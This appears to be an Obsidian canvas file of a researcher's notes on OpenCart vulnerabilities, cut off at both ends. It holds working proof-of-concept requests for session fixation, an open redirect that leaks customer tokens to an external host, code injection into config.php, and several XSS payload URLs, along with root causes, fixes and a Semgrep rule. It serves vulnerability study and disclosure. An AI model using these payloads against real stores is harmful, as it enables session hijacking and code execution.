32 | "color": "2",
33 | "fromNode": "bfd937018307d703",
34 | "fromSide": "right",
35 | "id": "617fd12cc3744546",
36 | "styleAttributes": {
37 | "pathfindingMethod": null
38 | },
39 | "toNode": "4006fc6337572b1e",
40 | "toSide": "top"
41 | },
42 | {
43 | "fromNode": "f3ca64c09118de8a",
44 | "fromSide": "top",
45 | "id": "75e236a6bb057ffe",
46 | "styleAttributes": {
47 | "pathfindingMethod": "square"
48 | },
49 | "toNode": "7a9075e0d6907e67",
50 | "toSide": "bottom"
51 | },
52 | {
53 | "fromNode": "f3ca64c09118de8a",
54 | "fromSide": "left",
55 | "id": "0402e666a935a1a0",
56 | "styleAttributes": {
57 | },
58 | "toNode": "7429e754d0a422cb",
59 | "toSide": "right"
60 | },
61 | {
62 | "fromNode": "7429e754d0a422cb",
63 | "fromSide": "left",
64 | "id": "685eec0c9a8b277a",
65 | "styleAttributes": {
66 | },
67 | "toNode": "7ca354fd21654453",
68 | "toSide": "right"
69 | },
70 | {
71 | "color": "2",
72 | "fromNode": "bfd937018307d703",
73 | "fromSide": "bottom",
74 | "id": "36b7ae96f96115b3",
75 | "styleAttributes": {
76 | },
77 | "toNode": "f4c3c7183fbfb086",
78 | "toSide": "top"
79 | },
80 | {
81 | "color": "2",
82 | "fromNode": "f4c3c7183fbfb086",
83 | "fromSide": "right",
84 | "id": "fda5e75b404e6dba",
85 | "label": "related",
86 | "styleAttributes": {
87 | "path": "dotted"
88 | },
89 | "toEnd": "none",
90 | "toNode": "8cfb2fca32a6a4b3",
91 | "toSide": "left"
92 | },
93 | {
94 | "color": "5",
95 | "fromNode": "bfd937018307d703",
96 | "fromSide": "bottom",
97 | "id": "fab473e35a87a341",
98 | "styleAttributes": {
99 | },
100 | "toNode": "c3b5022e0cd777c2",
101 | "toSide": "top"
102 | },
103 | {
104 | "color": "5",
105 | "fromEnd": "arrow",
106 | "fromNode": "c3b5022e0cd777c2",
107 | "fromSide": "left",
108 | "id": "93cc0aeff045e114",
109 | "styleAttributes": {
110 | "path": "dotted",
111 | "pathfindingMethod": "square"
112 | },
113 | "toNode": "7ca354fd21654453",
114 | "toSide": "bottom"
115 | },
116 | {
117 | "color": "5",
118 | "fromNode": "bfd937018307d703",
119 | "fromSide": "bottom",
120 | "id": "8883c809cc29c924",
121 | "styleAttributes": {
122 | "pathfindingMethod": null
123 | },
124 | "toNode": "3ffba2a72c15d234",
125 | "toSide": "top"
126 | },
127 | {
128 | "color": "2",
129 | "fromNode": "bfd937018307d703",
130 | "fromSide": "left",
131 | "id": "24ddf5b28f8220ca",
132 | "styleAttributes": {
133 | },
134 | "toNode": "736c9df76795c8a3",
135 | "toSide": "top"
136 | },
137 | {
138 | "color": "1",
139 | "fromNode": "bfd937018307d703",
140 | "fromSide": "right",
141 | "id": "cbf8daad04264761",
142 | "styleAttributes": {
143 | "pathfindingMethod": "a-star"
144 | },
145 | "toNode": "8e159ebf37163543",
146 | "toSide": "left"
147 | },
148 | {
149 | "color": "2",
150 | "fromNode": "bfd937018307d703",
151 | "fromSide": "right",
152 | "id": "46458ea60041838c",
153 | "styleAttributes": {
154 | "pathfindingMethod": null
155 | },
156 | "toNode": "5130f72c68fcb44c",
157 | "toSide": "left"
158 | },
159 | {
160 | "color": "2",
161 | "fromNode": "bfd937018307d703",
162 | "fromSide": "right",
163 | "id": "118825796013a0f7",
164 | "styleAttributes": {
165 | "pathfindingMethod": null
166 | },
167 | "toNode": "488acef427bc0ca2",
168 | "toSide": "top"
169 | },
170 | {
171 | "color": "2",
172 | "fromNode": "bfd937018307d703",
173 | "fromSide": "right",
174 | "id": "07dfd8cc39321be8",
175 | "styleAttributes": {
176 | "pathfindingMethod": null
177 | },
178 | "toNode": "f0d429c00ed4b383",
179 | "toSide": "left"
180 | },
181 | {
182 | "color": "2",
183 | "fromNode": "bfd937018307d703",
184 | "fromSide": "right",
185 | "id": "9f3c91f016697590",
186 | "styleAttributes": {
187 | "pathfindingMethod": null
188 | },
189 | "toNode": "0cb9ffa450d0f06c",
190 | "toSide": "left"
191 | },
192 | {
193 | "fromNode": "f3ca64c09118de8a",
194 | "fromSide": "right",
195 | "id": "74bb4cc0d5fe09ba",
196 | "styleAttributes": {
197 | "path": "long-dashed",
198 | "pathfindingMethod": "a-star"
199 | },
200 | "toNode": "d8eecf3260e78ee9",
201 | "toSide": "bottom"
202 | },
203 | {
204 | "fromNode": "f3ca64c09118de8a",
205 | "fromSide": "right",
206 | "id": "1a54d0190c9008c0",
207 | "styleAttributes": {
208 | "path": "long-dashed"
209 | },
210 | "toNode": "bd3975130bc38ec9",
211 | "toSide": "left"
212 | },
213 | {
214 | "fromEnd": "arrow",
215 | "fromNode": "0cb9ffa450d0f06c",
216 | "fromSide": "top",
217 | "id": "62d3a9e55b07ae45",
218 | "styleAttributes": {
219 | "path": "dotted"
220 | },
221 | "toNode": "bd3975130bc38ec9",
222 | "toSide": "bottom"
223 | },
224 | {
225 | "fromNode": "bd3975130bc38ec9",
226 | "fromSide": "right",
227 | "id": "001ce232a6716dfe",
228 | "styleAttributes": {
229 | "path": null,
230 | "pathfindingMethod": "square"
231 | },
232 | "toNode": "03db9bac6f37c6aa",
233 | "toSide": "bottom"
234 | }
235 | ],
236 | "metadata": {
237 | },
238 | "nodes": [
239 | {
240 | "height": 4000,
241 | "id": "38d37cd36af30a4f",
242 | "label": "Known vulnerabilities",
243 | "styleAttributes": {
244 | "border": null
245 | },
246 | "type": "group",
247 | "width": 5364,
248 | "x": -1427,
249 | "y": 382
250 | },
251 | {
252 | "height": 2164,
253 | "id": "ce573b456236baa2",
254 | "label": "Setup",
255 | "styleAttributes": {
256 | },
257 | "type": "group",
258 | "width": 1559,
259 | "x": -1849,
260 | "y": -3002
261 | },
262 | {
263 | "color": "5",
264 | "height": 1531,
265 | "id": "3ffba2a72c15d234",
266 | "styleAttributes": {
267 | },
268 | "text": "# Session fixation\n\n*admin_secret/controller/startup/session.php*\n*system/framework.php*\n\n```php title:\"admin_secret/controller/startup/session.php\"\n// Require higher security for session cookies\n$option = [\n\t'expires' => $this->config->get('config_session_expire') ? time() + (int)$this->config->get('config_session_expire') : 0,\n\t'path' => $this->config->get('session_path'),\n\t'secure' => $this->request->server['HTTPS'],\n\t'httponly' => false,\n\t'SameSite' => $this->config->get('config_session_samesite')\n];\n\nsetcookie($this->config->get('session_name'), $session->getId(), $option);\n```\n\nReferences:\n- https://github.com/opencart/opencart/issues/12939\n- https://github.com/opencart/opencart/issues/10280\n- ...\n## PoC\n\nA session ID chosen by the client is accepted as-is: the cookie is not reset but reflected back in the server response.\n\n```http title:'Cookies are not reset but instead are reflected in server response'\nGET /opencart-latest/admin/index.php HTTP/1.1\nHost: 127.0.0.1\nCache-Control: max-age=0\nCookie: OCSESSID=12345678901234567890123456\nConnection: close\n\n\nHTTP/1.1 200 OK\nDate: Fri, 21 Jul 2023 16:36:37 GMT\nServer: Apache/2.4.57 (Debian)\nSet-Cookie: OCSESSID=12345678901234567890123456; expires=Sat, 22 Jul 2023 16:36:37 GMT; Max-Age=86400; path=/opencart-latest/admin/; SameSite=Strict\n```\n\nAfter a successful login, no new session ID is issued; the pre-login cookie is kept and only its expiry is updated:\n\n```http\nPOST /opencart-latest/admin/index.php?route=common/login.login&login_token=582cc2550d2cbfcf0380ba178c462125 HTTP/1.1\nHost: 127.0.0.1\nCookie: OCSESSID=12345678901234567890123456\n\nusername=admin&password=admin\n\n\nHTTP/1.1 200 OK\nDate: Fri, 21 Jul 2023 16:35:47 GMT\nServer: Apache/2.4.57 (Debian)\nSet-Cookie: OCSESSID=12345678901234567890123456; expires=Sat, 22 Jul 2023 16:35:47 GMT; Max-Age=86400; path=/opencart-latest/admin/; SameSite=Strict\n\n{\"redirect\":\"http:\\/\\/127.0.0.1\\/opencart-latest\\/admin\\/index.php?route=common\\/login\"}\n```\n\nThe listing above also sets `'httponly' => false`, and neither `Set-Cookie` response carries an `HttpOnly` flag. Mitigation: issue a fresh session ID on login and do not adopt session IDs the server did not issue.\n\n",
269 | "type": "text",
270 | "width": 929,
271 | "x": -219,
272 | "y": 1590
273 | },
274 | {
275 | "height": 358,
276 | "id": "03db9bac6f37c6aa",
277 | "styleAttributes": {
278 | },
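279 | "text": "### Semgrep rule for detecting unsafe decoding\n\nThe rule flags request values that are passed through `urldecode()`. PHP has already URL-decoded request parameters, so this is a second decode and the decoded value needs validation before it is used. The rule's `message` is still a placeholder.\n\n```yaml\nrules:\n - id: urldecode-from-source\n severity: ERROR\n languages:\n - php\n message: Test\n patterns:\n - pattern: $data[...] = urldecode($BOJ->request->$METHOD['...']);\n```",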
280 | "type": "text",
281 | "width": 542,
282 | "x": 1730,
283 | "y": -1705
284 | },
285 | {
286 | "height": 875,
287 | "id": "dd4734ed9c201bfd",
288 | "styleAttributes": {
289 | "border": "dashed"
290 | },
291 | "text": "# Arbitrary File Upload in catalog/download.upload\n\n>[!info]\n>The stored file name gets a suffix that can't be guessed, and files are saved inside the `/storage` folder, which is usually outside the web root\n\n```http\nPOST /opencart-latest/admin/index.php?route=catalog/download.upload&user_token=c5658692bdafeb7f9c3b049532e07ad6 HTTP/1.1\nHost: 127.0.0.1\n\n------WebKitFormBoundaryFkyBYo2SIWb1a3pb\nContent-Disposition: form-data; name=\"file\"; filename=\"foo2.txt\"\nContent-Type: text/plain\n\nfoo\n\n------WebKitFormBoundaryFkyBYo2SIWb1a3pb--\n\n\nHTTP/1.1 200 OK\n{\"filename\":\"foo2.txt.e9d3b468bde9b84aea3e6d7884e24ab7\",\"mask\":\"foo2.txt\",\"success\":\"Your file was successfully uploaded!\"}\n```\n\nLog:\n```\nFile uploaded on `/var/www/html/opencart-latest/system/storage/download`\n\nname: foo2.txt\ntmp_name: /tmp/phpEVfTNf\nfilename: foo2.txt\nfile: foo2.txt.e9d3b468bde9b84aea3e6d7884e24ab7\n```\n\nThe file can be downloaded with:\n```http\nGET /admin_secret/index.php?route=catalog/download.download&user_token=bfd88496b05c083737fcc83d21a66e84&filename=application-x-addon.png.881efb1332597a33d23dad5008361bcb\nHost: localhost\n\n\nHTTP/1.1 200 OK\nContent-Description: File Transfer\nContent-Disposition: attachment; filename=\"application-x-addon.png.881efb1332597a33d23dad5008361bcb\"\n```\n",
292 | "type": "text",
293 | "width": 921,
294 | "x": 2385,
295 | "y": -2890
296 | },
297 | {
298 | "color": "2",
299 | "height": 1173,
300 | "id": "736c9df76795c8a3",
301 | "styleAttributes": {
302 | },
303 | "text": "# Parameter pollution + Open Redirection + token leak\n\nReferences:\n- https://forum.opencart.com/viewtopic.php?t=105805\n- \n\n*catalog/controller/account/login.php*\n\n```php title:'catalog/controller/account/login.php'\npublic function login(): void {\n...\n\tif (isset($this->session->data['redirect'])) {\n\t\t$data['redirect'] = $this->session->data['redirect'];\n\t\tunset($this->session->data['redirect']);\n\t} elseif (isset($this->request->get['redirect'])) {\n\t\t$data['redirect'] = urldecode($this->request->get['redirect']); // source\n\t} else {\n\t\t$data['redirect'] = '';\n\t}\n\t...\n\t// Create customer token\n\t$this->session->data['customer_token'] = oc_token(26);\n\t$this->model_account_customer->deleteLoginAttempts($this->request->post['email']);\n\t// Added strpos check to pass McAfee PCI compliance test (http://forum.opencart.com/viewtopic.php?f=10&t=12043&p=151494#p151295)\n\tif (isset($this->request->post['redirect']) && (strpos($this->request->post['redirect'], $this->config->get('config_url')) !== false)) {\n\t\t$json['redirect'] = str_replace('&amp;', '&', $this->request->post['redirect']) . '&customer_token=' . $this->session->data['customer_token'];\n\t} else {\n\t\t$json['redirect'] = $this->url->link('account/account', 'language=' . $this->config->get('config_language') . '&customer_token=' . 
$this->session->data['customer_token'], true);\n\t}\n...\n```\n\n## PoC\n\n## Parameter Pollution\n\nhttp://localhost//index.php?route=account/login&language=en-gbr&redirect=http://0xbro.red/?http://localhost/opencart-latest/index.php?route=account/download\n\n```http\nGET /index.php?route=account/login&language=en-gbr&redirect=http://0xbro.red/?http://localhost/opencart-latest/index.php?route=account/download HTTP/1.1\nHost: localhost\n\n\nHTTP/1.1 200 OK\n \n\n```\n\n## Open Redirection\n\nThe `strpos(...) !== false` check only requires `config_url` to appear somewhere in the posted `redirect` value, not at its start, so an external URL that contains the store URL passes the check and the `customer_token` is appended to that external URL. Comparing the scheme and host of the parsed URL against the store's own, or accepting only relative paths, would avoid this.\n\n```http\nPOST /opencart-latest/index.php?route=account/login.login&language=en-gb&login_token=51ff83a8903ae28b28d8ab9f7d HTTP/1.1\nHost: localhost\nContent-Length: 168\n\nemail=customer1%40opencart.com&password=customer1&redirect=http%3A%2F%2F0xbro.red%2F%3Fhttp%3A%2F%2Flocalhost%2Fopencart-latest%2Findex.php%3Froute%3Daccount%2Fdownload\n\n\n\nHTTP/1.1 200 OK\n{\"redirect\":\"http:\\/\\/0xbro.red\\/?http:\\/\\/localhost\\/opencart-latest\\/index.php?route=account\\/download&customer_token=6b477d397c440f16f7742f6517\"}\n```",
304 | "type": "text",
305 | "width": 1060,
306 | "x": -1371,
307 | "y": 1811
308 | },
309 | {
310 | "color": "1",
311 | "height": 1605,
312 | "id": "8e159ebf37163543",
313 | "styleAttributes": {
314 | },
315 | "text": "# Static Code Injection in common/security.admin - CVE-2023-47444 (pt. 2)\n\n>[!info]\n>The vulnerability can be exploited only if the admin path is still the default\n\nRoot cause: the pattern passed to `preg_replace` has no delimiters of its own, so PHP takes the square brackets as the delimiters and the expression no longer acts as a character class. Quotes and parentheses in `name` therefore survive the filter and are written into `config.php` inside a single-quoted PHP string. The range `A-z` is also wider than `A-Z`. A fix needs a delimited pattern such as `/[^a-zA-Z0-9]/`.\n\n*admin/controller/common/security.php*\n```php title:'admin/controller/common/security.php'\npublic function admin(): void {\n\tif (isset($this->request->get['page'])) {\n\t\t\t$page = (int)$this->request->get['page'];\n\t\t} else {\n\t\t\t$page = 1;\n\t\t}\n\n\t\tif (isset($this->request->get['name'])) {\n\t\t\t$name = preg_replace('[^a-zA-z0-9]', '', basename(html_entity_decode(trim((string)$this->request->get['name']), ENT_QUOTES, 'UTF-8')));\n\t\t} else {\n\t\t\t$name = 'admin';\n\t\t}\n\t\t$json = [];\n\t\tif ($this->user->hasPermission('modify', 'common/security')) {\n\t\t\t...\n\t\t}\n\t}else{\n\t\t//error\n\t}\n\tif (!$json) {\n\t\t// 1. We need to copy the files, as rename cannot be used on any directory, the executing script is running under\n\t\t...\n\t\t// Add the file to the files to be deleted array\n\t\t// 2. Create the new admin folder name\n\t\tif (!is_dir($base_new)) {\n\t\t\tmkdir($base_new, 0777);\n\t\t}\n\t\t// 3. split the file copies into chunks.\n\t\t$total = count($files);\n\t\t$limit = 200;\n\t\t$start = ($page - 1) * $limit;\n\t\t$end = $start > ($total - $limit) ? $total : ($start + $limit);\n\n\t\t// 4. Copy the files across\n\t\t...\n\t\tif (($page * $limit) <= $total) {\n\t\t\t// redirect\n\t\t} else {\n\t\t\t// Update the old config files\n\t\t\t$file = $base_new . 'config.php';\n\t\t\t$output = '';\n\t\t\t$lines = file($file);\n\t\t\tforeach ($lines as $line_id => $line) {\n\t\t\t\t$status = true;\n\n\t\t\t\tif (strpos($line, 'define(\\'HTTP_SERVER') !== false) {\n\t\t\t\t\t$output .= 'define(\\'HTTP_SERVER\\', \\'' . substr(HTTP_SERVER, 0, strrpos(HTTP_SERVER, '/admin/')) . '/' . $name . '/\\');' . 
\"\\n\"; // RCE!\n\t\t\t\t\t$status = false;\n\t\t\t\t}\n\n\t\t\t\tif (strpos($line, 'define(\\'DIR_APPLICATION') !== false) {\n\t\t\t\t\t$output .= 'define(\\'DIR_APPLICATION\\', DIR_OPENCART . \\'' . $name . '/\\');' . \"\\n\"; // RCE!\n\t\t\t\t\t$status = false;\n\t\t\t\t}\n\n\t\t\t\tif ($status) {\n\t\t\t\t\t$output .= $line;\n\t\t\t\t}\n\t\t\t}\n\t\t\t// write file\n\t\t}\n\t}\n}\n```\n\n# PoC\n\n\n```http\nGET /opencart-latest/admin/index.php?route=common/security.admin&page=10&user_token=3cf1fa8ece0d0edce6354eab30d7d932&name=admin1');phpinfo();%23 HTTP/1.1\n\nHTTP/1.1 200 OK\n{\"redirect\":\"http:\\/\\/127.0.0.1\\/opencart-latest\\/admin1');phpinfo();#\\/index.php?route=common\\/login\"}\n```\n\n```php title:config.php\n...\n// HTTP\ndefine('HTTP_SERVER', 'http://127.0.0.1/opencart-latest/admin1');phpinfo();#/');\n...\ndefine('DIR_APPLICATION', DIR_OPENCART . 'admin1');phpinfo();#/');\n...\n```\n",
316 | "type": "text",
317 | "width": 1706,
318 | "x": 823,
319 | "y": 2547
320 | },
321 | {
322 | "color": "2",
323 | "height": 576,
324 | "id": "0cb9ffa450d0f06c",
325 | "styleAttributes": {
326 | },
327 | "text": "# Multiple XSS\n\n[CVE-2024-21515](https://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-7266573) - Fixed (?)\n\n```\n/admin/index.php?route=tool/log.download&filename=error.log%3Cimg+src%3D1+onerror%3Dalert%281%29%3E\n```\n\n[CVE-2024-21516](https://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-7266576)\n\n```\n/admin/index.php?route=common/filemanager.list&directory=demo%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E%253Cinput%2Btype%253D%2522hidden\n```\n\n[CVE-2024-21517](https://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-7266577)\n\n```\n/index.php?route=account/login&language=en-gb&redirect=%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E%253Cinput%2Btype%253D%2522hidden\n```\n\n",
328 | "type": "text",
329 | "width": 1087,
330 | "x": 2026,
331 | "y": 520
332 | },
333 | {
334 | "color": "2",
335 | "height": 597,
336 | "id": "4006fc6337572b1e",
337 | "styleAttributes": {
338 | "border": null
339 | },
340 | "text": "# CVE-2020-10596 - Stored XSS in common/filemanager.list\n\nReferences:\nhttps://security.snyk.io/vuln/SNYK-PHP-OPENCARTOPENCART-571935\nhttps://github.com/opencart/opencart/issues/7810\nhttps://github.com/opencart/opencart/issues/7974\nhttps://www.exploitalert.com/view-details.html?id=35634\n\n```http\nPOST /opencart-latest/opencart/admin_secret/index.php?route=common/filemanager.upload&user_token=dc9212bb7217a3336fa53f75169be7b6 HTTP/1.1\n...\nContent-Disposition: form-data; name=\"file[]\"; filename=\"\\\">